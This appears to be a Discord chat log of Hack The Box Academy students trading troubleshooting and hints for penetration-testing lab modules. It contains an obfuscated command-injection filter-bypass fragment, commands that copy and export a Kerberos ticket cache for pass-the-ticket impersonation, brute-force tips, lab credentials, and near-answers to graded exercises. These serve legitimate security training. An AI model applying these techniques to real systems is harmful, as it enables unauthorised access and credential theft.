in this case what should I do?
this is the md5sum
redownload
my HTB vms are not loading and are buggy
when i click start instance it says i have one open already
sounds like a browser issue
might wanna reach out to support about that
Can I get some help with the Bleichenbacher and DROWN section. Everytime I run the attack it wont work with the pcap file unless I create a ||socat tunnel or use -connect. ||
change to a userlist and add just the username (just to make sure) and use a better wordlist.
reset the target
the username@foggy estuary is the right format
again?
also you don't need to specify the port
Now I've done this, and it's taking longer to work
but now i ctrl c
there is something wrong
now i re-spawning the target
don't use a userlist
you have the right username
if it's works for marcie then it's probably a layer 8 issue
nothing, i dont know why it does not work
anyway I'm moving away from the PC for 10 minutes, so it will be inactive for a while
i would recommend going back over the section that taught you this
and make sure you're using the right list as well
what is that IP address
check spelling
my spawned target
issue was a layer 8 issue on their end
user@inlanefright.htb
^
nvm
tell me when you see it
it was indeed layer 8 issue 
now it works
lol i said that first.. he said he copy/pasted
kudos to me lol
spooky company
technically the username was correct - the domain was not
the context was -l for hydra, the username flag 😛
yes
but saying wrong username led to some confusion
bc they immediately thought "uh no i have the right user"
i guess i need to make another vm for malware
just download kali; windows flags it as malware 
i have completed the moduleeee, amazing
when i tagged u, discord blocked me, lol
.
if you tag too many people automod says no
So I am in the Shells & Payloads module in the "Reverse Shells" section and I cannot get the attack box to stay stable enough to do anything. Have tried using pwnbox and my own VM. Assistance would be greatly appreciated!
I didn't know, because I only tagged myself when I wanted to tag you. good to know
Working on the Command Injections module and it looks like https://github.com/Bashfuscator/Bashfuscator isn't playing nicely with aarch64. Anyone able to recommend an alternative? 🤔
Did you need help with it?
Okay. I ran into a bit of trouble with it, but it was a stupid mistake. Make sure you have the command it gives you right 😂
@mild cypress please check dm
you don't really need it for that module iirc
change vpn regions and respawn the target
wait ~ 5-10 minutes for it to launch fully
login brute force IS THE WORST module
yes
hydra is fine and shit
but finding the right wordlists is just pain
and waiting for it to crack is also pain
did you complete the path ?
which path
for example the pentesterpath
nah
but im doing it
still brute force is fucked man
annoying but easy , yes
wordlists sucks
i made it almost to the end
so its pretty easy when it comes to progress but at certain times its fucked
they explain it pretty nice
different strengths, different weaknesses
it is explained but for me its fucked
if login brute forcing its fucked, then AD... :))
AD was nice
see
different strengths, different weaknesses
AD is more complex
it is
you can add more time. 😄
I also observed that some times I have the button to add more time, but sometimes no
💀 bro
I hope that in two weeks I will finish CPTS path and I will try to take it.
so you passed command injection already 😉 ?
No. Probably I will start it this weekend.
they teach you everything
and in every task you have to find out some part yourself lol
is it really that hard?
im still at web proxies xd
for me it is
what does it talk about
it talks about command injections
like escaping controls to inject commands?
maybe be more specific
it looks kinda like this
||{IFS}${PATH:0:1}usr${PATH:0:1}share${PATH:0:1}${IFS}|${IFS}||
WTF
Use google for solutions. 🙂
the module wasn't too difficult
Different strengths and weaknesses
What are injections, and different types
Identifying code vulnerable to command injections
Different command injection operators we can use
When to use each injection operator, depending on the injection case
Creating a command injection payload
Bypassing front-end input validation and sanitization filters
Identifying back-end filters and security mitigations
Identifying which characters are blacklisted
Different techniques to bypass various blacklisted characters such as spaces, slashes, and semi-colons
Different techniques to bypass various blacklisted commands
Building unique obfuscation methods to bypass blacklisted commands
Using evasion tools to create advanced obfuscated payloads
How to turn vulnerable code to code that is secure against command injections
is source analysis too
at the end
gg i gotta skip that module
if you want to become CPTS you can't
running away won't save you
;\
@dim wolf mind for a nudge ?
i have no notes on that module so i'm afraid can't help you
funny, even if it did not really help 😉
dont listen to marcielee
she doesnt wanna let you go ahead, youll get stuck for the rest of your life
that's a skill issue
where are you stuck at
just thug it out
i believe in u
right mindset
i need this || | || obfuscated please
Nope, you don't. But I'd still like to play with the tool for learning purposes (or a similar alternative if one exists 🤷 )
install kali ?
Brother I've helped people get further past where I'm at
true and based
I'm using kali 🤔 Not sure what you mean.
didn't you say you're using arch?
oh arm
Arm64 === Aarch64
Tried it now twice
Try using rdesktop
In my experience rdesktop is a lot more stable than xfreerdp.
rdesktop -u htb-student -p HTB_@cademy_stdnt! <IP>
Well, it connected quickly, now my entire VM is frozen 😂😂
is there a better VM out there for this than VMware? This honestly happens in every module and seems like I'm the only one I talk to that has to keep dealing with crap not working I want to get this stuff done for fsakes.
finally done with the logrotate section. Found a way to make the reverse shell stick! 🙂
(Help) HTTPs/TLS Attacks
Skills Assessment
I was able to retrieve the admin token. When I use it to redeem the admin token, it sends an email. I don't know what to do to retrieve the flag. Any help, please?
what am i doing wrong to prevent the options flag from showing me whats allowed?
Don't use -i?
I had a lot of issues with my Kali as well. I deleted my VM and then setup a new one in VMware and then did a sudo apt upgrade/update and haven’t had any issues for a long time.
And remember to not provide too many cpu cores but plenty of ram.
Well I've done that as well, 16GB of RAM. 2 cores. but finally got it running. I did another sudo apt-upgrade/update. Have a 2,000 dollar ASUS computer from work for this reason lol.
but for this module I turned off the firewalls, ran the command as administrator and it never works, so I went into the control panel and turned off the firewalls and keep getting this when I run the payload. Is there something other than the IP you need to change?
Well I don't know how to share the screenshot here
take the screen shot from your host instead of the vm
Wont let me post a file to this server, I have the app open on my host
tried pasting in as well
I’m having issue with this ? + 1 What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
it never really ends
true
attacking common applications - Find another valid user on the target GitLab instance. i found 4 other users and it's not accepting any of them. the scan is still going. this is going to take forever. does anyone have a good userlist? i feel like i'll have to use the 10 million usernames ones and i just want to move on with the module and not sit here for hours while it goes.
yeah kinda dumb, it's gatekeeping the next part of the module for no reason
the concept is easy, i run the python script and it enumerates from a list of users.. i get it. i can move on, but it won't let me without the answer and it doesn't accept any of the other 4 answers so far.
literal hours to wait for this dumb thing
same like in password module 😄
but in reality its way harder lol
especially when you do a retest and they hardened everything
ok ready for someone to just tell me the answer lol
this thing has been running for an hour now
they should provide a small userlist.txt or something
Hii. I was solving a question from the Introduction to Bash module. Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer. I got the var matching with the value, but when I tried to submit the answer it shows me wrong answer. Any help?
I'm completely at a loss on Password Attacks Lab - Hard
why -?
I bruteforced johanna's password, which got me access to both smb and rdp, but she doesn't seem to be able to access anything in smb, and the entire module teaches me ways to use rdp as an admin, but she isn't an admin. I can't find anything
NFS exists, but when I enumerated it it showed there wasn't anything to mount, so I'm not sure what that's all about
did you take notes ?
dm me the notes if you like
Can anyone who has completed Attacking Common Applications help me out?
this module is straight up broken. the app dies after so many enumeration attempts, so you can't get through the whole userlist
I killed my lab trying to brute force rdp lol
yeah i'm pretty sure you're not actually supposed to use the 10 million user list, but the problem is the smaller list turns up nothing (it actually turns up another user "bob" but the answer isn't accepted)
Theres a keepass on the system I think on that one
I found the keepass but I can't find the master pass
Did you get the login from the keepas?
No, it gives you the username Johanna and I brute forced it. Couldn't access anything on smb but RDP works. Found the keepass login app but haven't unlocked it
right so if you have the keepass login and you can rdp, go unlock it 😛
ohh you found the app, but not the keepass file?
No, I mean I found the app to unlock keepass but I don't have the file
I pm'd you
I'm working on cracking the hash for the svc_workstations account before I can ssh login to get the flag for question 5 of the "Pass the Ticket (PtT) from Linux" module. I am using mode 1470 in hashcat to crack the password, I've tried leveraging the mutated password list from the resources and the rockyou list, both are exhausted. Either I'm using the wrong hashcat method or there is a step I'm missing. Any hints?
what does the question ask
if you're passing a hash, you generally aren't cracking a password
"Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory."
the instructions in the material say to crack the hash to obtain the password for that user
and then login with ssh
ill check my notes sec
list: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Did you do this part of the module instructions?
can you paste the contents of svc.txt
ah i think for that one you need to find the main ticket
and then you need to impersonate it
with the command silvance gave above 😛
right, pass the hash instead of cracking
noo
ok . I was taking my cue from
pass the ticket :p FILE:/tmp/krb5cc_647402606
the question is a red herring i guess
I'll be honest i looked everywhere for the ticket on that one. But its in the logs of the linikatz
wait, no, that's once you've logged in with the svc account
I'm trying to get the password to login with the svc account
You dont have to log in, you're impersonating the user with pass the ticket 😛
MODULE: HTTP ATTACKS
SECTION: TE.CL
I'm struggling with the accompanying exercise for this section and could really use some pointers to make sure I'm not fundamentally misunderstanding the attack:
Payload 1:
I'll just try it
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
this is pass the ticket
Payload 2:
change the /root/krb5cc with the ticket i gave you
no one here has done the attacking common applications yet?
Make sure you understand the difference though: pass the hash steals the user's hash to log in, pass the ticket impersonates them by exporting
so as I suspected, I don't yet have the privileges to access that tmp file
getting permissions denied
right so do a search for all the tickets and try to elevate some more 😛
doesn't seem to have access rights, I just impersonated the ticket
what are you trying to access?
Just to provide as much info as I can
Hello..I am using the smtp-user-enum script for enumerating users in the Footprinting - SMTP module. The wordlist I used is from the resources. It is just 101 users. However, the script returns to me 0 results. How can it be? I used -M VRFY option
you'll note there are no root krb files, and I don't have sufficient permissions to access any of them
the material has you find kt for carlos, dump the hash, crack the hash, and switch user to carlos, then the next instruction is to reiterate through those steps for svc_workstations
I asked for help in #1024429874246590575 but the post got deleted?
I've found the kt, dumped the hash value, but can't crack, and crackstation doesn't have anything for it
I'm sure you impersonate the svc_workstations ticket to get that flag ^
the next step you can do that "Once we log in with the credentials for the user svc_workstations, we can use sudo -l and confirm that the user can execute any command as root. We can use the sudo su command to change the user to root."
in order to crack the hash I passed it through hash-identifier
so i went with the mode for sha-256 (1470), and leverage the mut_passwords.list for this module, also rockyou
can i pm you?
Hello. I have also tried the smtp-user-enum.pl script but did not help. Syntax: perl smtp-user-enum.pl -v -M VRFY -U ~/Downloads/footprinting-wordlist.txt -t 10.129.130.100 . Result is 0 .
Don't worry..I will increase the timing..wait.
Which is incorrect? The banner version or the username?
Hi everyone. The academy VPN keeps dropping me constantly. I am in for 1 minute or so , then it drops me. If i reset the target and reconnect, it is good again. But after 1 minute, it drops me again. I always have to reset. And this does not happen to me the first time. I cannot do footprinting if the connections keep dropping. If there is no solution to this, I need to cancel my subscription (basic subscriber).
Hello all, i've got a quick question regarding the module NTLM Relay Attacks, chapter "Advanced NTLM Relay Attacks Targeting Kerberos". Long story short, we end up getting a TGT for a user, then perform a pass-the-ticket and authenticate to the DC. I am assuming any domain user can therefore authenticate to the DC (?), and if so, since this user has low privileges (afaik), what's the point of doing so? like, once on the DC with evil-winrm, what would be the next step for an attacker?
anyone complete Attacking Common Applications?
Once you compromise another user, you can enumerate with the new user who may have different privs
right that makes sense, thought i was missing something in particular
Hello there, is the target spawning not working again? I am on the Skills Assessment for Intro to Deserialization Attacks and it has been almost 30 minutes.
am I supposed to put sda/path/to/share lol like wth
hi everyone! I got stuck for hours on the Linux Privilege Escalation module (51), section 475, regarding the kernel exploit. This specific section talks about what kernel exploits are, with an example of Dirty COW. Then it goes on to show how to search for an example on Google: you grab the kernel version and you search for an exploit. It shows what it found for 4.4.0-116-generic. However, the target system being different, they of course specify that you have to attempt another exploit.
I've done all the google search I could think of looking for the specific version. Ran all the suggesters I could find. I decided to give up and click on the hint. It showed me an obscure CVE that did not come up from my searches, and obviously it worked right away.
Then, for good measure, I tried to look for it specifically for the kernel I was working on and nothing. My question is the following, how do people find this CVE if they aren't looking at the section's hint? I understand that it was publically available, but I want to know how I can improve my searching skills
when did AU servers become a thing for academy?
can anyone help me out. I forgot my user password on linux and now I don't know how to set up the ssh
Do you have physical access to the machine, if so then use single user mode
how do I do that. I'm really new to linux lol
TipsAndTricks/ResetRootPassword
https://wiki.centos.org/TipsAndTricks(2f)ResetRootPassword.html
Does the RDP and SOCKS Tunneling with SocksOverRDP section work for anybody? I've done the thing so many times and can't get that final connection for Jason. It seems to randomly die, I've turned off antivirus and run things as administrator where possible
how are you
Hey onto HACKING WORDPRESS: Directory Indexing
Question: Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.
I have found the directory with the directory listing enabled and looked into it but found no files containing the flag
Anyone can give a nudge to it?
Where are you stuck?
seems to be broken. attacking gitlab portion, can't enumerate the other valid user
the server kept crashing and i had to reset 3/4 times, eventually i got a stable one and ran through the 10 million username list, and i found like 4 other usernames but none worked
so i just want the answer so i can move on, or at least the usert list to use because it's not in seclists
none of those work
ran for like 6 hours
module is straight up broken
||-w /opt/useful/SecLists/Usernames/cirt-default-usernames.txt||
I hope this will help
tried that too
i literally did all of them in the folder
i'll try again
was hard getting a stable server
like i get the concept.. run the script and find users.. not hard
reset the target and try again
confirm me here if you have found the answer..!
i reset it a lot
do you have access to pwnbox?
yeah
give it a try there
they need to beef up the resources on the server it can't handle that python script
trying again with that word list
it's done
and it returned the same users, doesn't work
same ones i found before
yeah you have it
You have the answer
go ahead and try
my god case sensitive?
Linux be Linux 🤷♂️
well thanks... 10 hours later it's done
Ouch 😐
there are multiple answers and it only accepts one with a specific case...
did you solve it
that should be adjusted
Yes
Hey anyone can help me with it..?
can I dm you for this module
I only done that section lol
i haven't done that module, but if it wants you to find a directory being hosted on the site and then navigate to those directories to find flag.txt, why not just gobuster or feroxbuster the directories? the question does say specifically to go to the ones covered in the module, maybe try there first?
ok, can I add you as a friend? Others may ask you for advice in the future.
Can you DM me the exact command you used, showing the wordlist path? Odd that it came back with multiple results.. it could be the wordlist has been updated since the module was published.
- 1 Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. footprinting/fingerprinting dns, idk how to do it, i looked at dig but did not find it
you can query the name server and get the FQDN
nope
└──╼ $dig @ns.inlanefreight.htb inlanefreight.htb ANY
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> @ns.inlanefreight.htb inlanefreight.htb ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30673
;; flags: qr aa rd; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 041a4820075184290100000065eaa6a5041788a2f2559c26 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN ANY
;; ANSWER SECTION:
inlanefreight.htb. 604800 IN TXT "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb. 604800 IN TXT "MS=ms97310371"
inlanefreight.htb. 604800 IN TXT "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
;; ADDITIONAL SECTION:
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
;; Query time: 80 msec
;; SERVER: 10.129.15.43#53(ns.inlanefreight.htb) (TCP)
;; WHEN: Thu Mar 07 21:47:46 PST 2024
;; MSG SIZE rcvd: 437
you are overcomplicating things with your command but still you have the answer there ¯\_(ツ)_/¯
i'm on the public exploits section of getting started, and following the instructions to search exploits by plugin returns 84 exploits. the pwnbox screen is so small that the terminal output wraps around on itself and makes it hard to distinguish which exploit is which
You can open the workstation in a new tab
damn